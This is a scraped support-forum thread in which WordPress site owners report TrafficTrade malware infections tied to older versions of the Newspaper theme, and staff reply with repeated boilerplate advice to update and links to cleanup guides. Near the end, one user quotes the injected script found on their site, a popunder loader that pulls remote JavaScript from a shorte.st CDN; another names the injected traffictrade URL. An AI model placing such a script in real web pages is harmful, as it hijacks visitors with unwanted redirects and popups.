No search results were found in Documentation!
Hello akashdeep305,
Please be sure that our theme has no malware because, before each update, the theme is fully checked and inspected and also, the Envato Market does not allow to load any infected files on the platform, sorry! Most likely, the problem happens due to your side. Also, if you have been the victim of an attack, update your theme immediately to the latest version and use one of these guides:
http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
Here is a link for best WordPress security practices created by Chris S:
https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
Thank you for your understanding!
Hi,
My site has been infected by the famous Traffictrade malware.
I’ve removed the script from Theme panel Header ad field manually. The script does not appear again there.
Please note the facts:
- I have the latest updates of WordPress core, all plugins and Newspaper 8.1.
- There are no other deactivated themes or plugins on my installation (except Twenty Seventeen).
- There is no sign of traffictrade malware in the db.
- There is no sign of traffictrade malware in the source code.
- I do not have the searchreplacedb2.php script on my server.
- I have the latest Wordfence (and WAF) installed & configured.
My site still redirects to spam sites.
When I deactivate all plugins the site redirects.
When I deactivate all plugins and activate the Twenty Seventeen theme the site is ok.
When I activate all plugins and activate the Twenty Seventeen theme the site is ok.
So my conclusion is that something goes wrong with Newspaper 8.1 theme.
Please keep in mind that I’ve tested the same installation to different servers.
I’ve also tested with all WP core, plugins and themes files fresh downloaded and replaced.
What do you think we can do to clean the theme? I’ve read that this issue has been resolved in the past, but you can see the situation I’ve described.
Thank you in advance for your help.
Version of theme legally downloadable from your themeforest account has no malware.
ello,
Please note that the theme has to be updated along with WordPress and plugins. Old versions can have security breaches and these can be exploited by different tools.
The old version from prior to April 2016 had a security issue which was patched in 6.7.2. Similarly WordPress prior to 4.7 is insecure.
Please make sure you update your theme, plugins and WordPress and do not stick to old versions.
If you have been the victim of an attack, update your theme immediately to the latest version and use one of these guides:
http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
Thank you!
Hello,
Using such an old version of the theme is extremely risky.
ello,
Please note that the theme has to be updated along with WordPress and plugins. Old versions can have security breaches and these can be exploited by different tools.
The old version from prior to April 2016 had a security issue which was patched in 6.7.2. Similarly WordPress prior to 4.7 is insecure.
Please make sure you update your theme, plugins and WordPress and do not stick to old versions.
If you have been the victim of an attack, update your theme immediately to the latest version and use one of these guides:
http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
Here is a link for best WordPress security practices created by Chris S:
https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
Thank you!
Tagdiv – our host (synthesis) is warning against using newspaper due to a published vulnerability. Please advise asap:
https://www.wordfence.com/blog/2017/08/traffictrade-malware/
Hi,
Our customer website was hacked. He didn’t update the website since some years and now after the attack, he is in a hurry to update. We try to make the web update from an old backup, but we have problems to go from version 4.5a to the current one. Some shortcodes like a blocks fail. Now we have wp 4.8.1 and last js_composer. If we install td_social counter plug it fails too.
Can you help us please… We can’t publish the website with this version, since it is vulnerable.
Thx a lot,
Hello infinitybgn,
Please note that the theme has to be updated along with WordPress and plugins. Old versions can have security breaches and these can be exploited by different tools.
Please make sure you update your theme, plugins, and WordPress and do not stick to old versions.
If you have been the victim of an attack, update your theme immediately to the latest version and use one of these guides:
http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
Here is a link for best WordPress security practices created by Chris S:
https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
Thank you!
Hi,
Maybe your install got infected somehow. You could try a theme reinstall by FTP
– https://forum.tagdiv.com/install-via-ftp/
And activate only the plugins that are provided with the theme. Then scan with the tool again and see if it still detects malware.
This is an extensive security tutorial that may be useful as well
– https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
However you should consider updating the theme and plugins to the latest version, if possible
– https://forum.tagdiv.com/how-to-update-the-theme-2/
Thanks
Hi,
Please note that the theme has to be updated along with WordPress and plugins. Old versions can have security breaches and these can be exploited by different tools.
Please make sure you update your theme, plugins, and WordPress and do not stick to old versions.
If you have been the victim of an attack, update your theme immediately to the latest version and use one of these guides:
http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
Here is a link for best WordPress security practices created by Chris S:
https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
Thank you!
Hello akashdeep305,
Please note that the theme has to be updated along with WordPress and plugins. Old versions can have security breaches and these can be exploited by different tools.
The old version from prior to April 2016 had a security issue which was patched in 6.7.2. Similarly, WordPress prior to 4.7 is insecure.
Please make sure you update your theme, plugins, and WordPress and do not stick to old versions.
If you have been the victim of an attack, update your theme immediately to the latest version and use one of these guides:
http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
Here is a link for best WordPress security practices created by Chris S:
https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
Thank you!
Hello danielalonso,
Please note that the theme has to be updated along with WordPress and plugins. Old versions can have security breaches and these can be exploited by different tools.
The old version from prior to April 2016 had a security issue which was patched in 6.7.2. Similarly, WordPress prior to 4.7 is insecure.
Please make sure you update your theme, plugins, and WordPress and do not stick to old versions.
If you have been the victim of an attack, update your theme immediately to the latest version and use one of these guides:
http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
Here is a link for best WordPress security practices created by Chris S:
https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
Thank you!
Hello,
I’m using the Newspaper 6.6.4. I had a problem with it. The Header Ad was modified everyday and include a redirect to a website that contains malware.
I have to go to admin panel and delete the malicious code every day.
I used a malware scan tool and found out that includes/wp_booster/wp-admin/panel/td_view_import.php contains SuspiciousEncoding.
Is there any way to fix this?
Thank you
No malware in theme.
my hosting provider says i have mmalware in your newspper function.ph file that’s i want to say you
After reading this article today from Wordfence I’m really worried:
https://www.wordfence.com/blog/2017/08/traffictrade-malware/
Is Newspaper 8.0/8.1 free from the vulnerability the article shows?
Daniel
Hello,
People usually use the duplicator plugin to move over all of the content but in a malware scenario i;m not sure it;s recommended. I’m afraid you will lose the social media data when moving to a new domain. Sorry. It is better this way than to move the hack as well.
I could be wrong though. Maybe some of our users who have better experience with moving sites to different domains can help with a suggestion. Or maybe you can find a solution online as this is WordPress related, not specific to the theme.
Thank you!
Bogdan,
I deleted Newspaper old version from my server and then I installed 8.1 version.
Is there still any possibility of malware?
When I deleted the old version of theme then I couldn’t see any Malware. Seems deleting of old theme fixed it. Could you please confirm.
Hi,
Also please note that if you have already been hacked, changing theme versions will not fix the problem. You should also clean your install by following these few guides:
http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
Thanks.
Hello,
I have created a staging site using the Newspaper Theme 8 to this test url: http://062.257.myftpupload.com/
We presently have a live site but we have had problems with files being corrupted and malware so we want to re-build the site from the ground up.Here is the URL: http://powerofhumans.com/. We are hosting this site through GoDaddy.com.
Our biggest concern is having all of the social media data from Facebook, Twitter and Instagram lost in the transition. How would you recommend moving the content over to the new staging server?
Thank you so much for your help in advance,
Adria
thew malware is in the database files
It happened to some sites I was managing,
1) run a mysql search for : %%traffictrade%%
2) delete it from table
3) switch to latest php version
4) make sure to change all passwords
I would also check on some of the plug ins that have been installed
like Chris posted above scan your site with scuri make sure none of your photos, plugins are clean
Hi,
I was using old version of newspaper theme (Around 1 year old)
yesterday someone injected Malware in Header Ads code – traffictrade.life/scripts.js/
I tried removing it but it was again getting inserted. Then I uninstalled old theme and installed new version
Now that Malware is not appearing but I want to know whether newer version is malware safe or not? Is there any known bugs related to old version that says Malware can be injected in Newspaper theme?
Same thing is happening with my website. I was using previous version of Newspaper (around 1 year old version)
Can anyone tell me if newer version is fine and will not get any Malware?
Someone was injecting this script in header traffictrade.life/scripts.js
Can anyone confirm if this was because of using old version of newspaper theme? New version is secured ?
We do use Securi and keep WordPress constantly updated. We have an https site, with numerous malware trackers. We host several sites with the company, and it’s only happening with our two sites using the Newspaper theme.
My sites keeps showing a popup to another site, when I investigate the code – it shows the following:
<script type="text/javascript">//<![CDATA[
(function() {
var configuration = {
"token": "8f1bc5aa7e697f9829c057cfd305bd64",
"popUnder": {
"enabled": true
}
};
var script = document.createElement('script');
script.async = true;
script.src = '//cdn.shorte.st/link-converter.min.js';
script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
var entry = document.getElementsByTagName('script')[0];
entry.parentNode.insertBefore(script, entry);
})();
//]]>
I have also noticed other people with the same issue on the Newspaper theme:
https://stackoverflow.com/questions/44038908/how-to-determine-how-someone-is-hacking-my-wordpress-site
Here is a link to my site
https://goo.gl/iHfsxQ
Can you please advise how to fix this, I have removed all wordpress files, updated theme, removed and installed all plugins again, ran wordfence and anti-malware and its still there.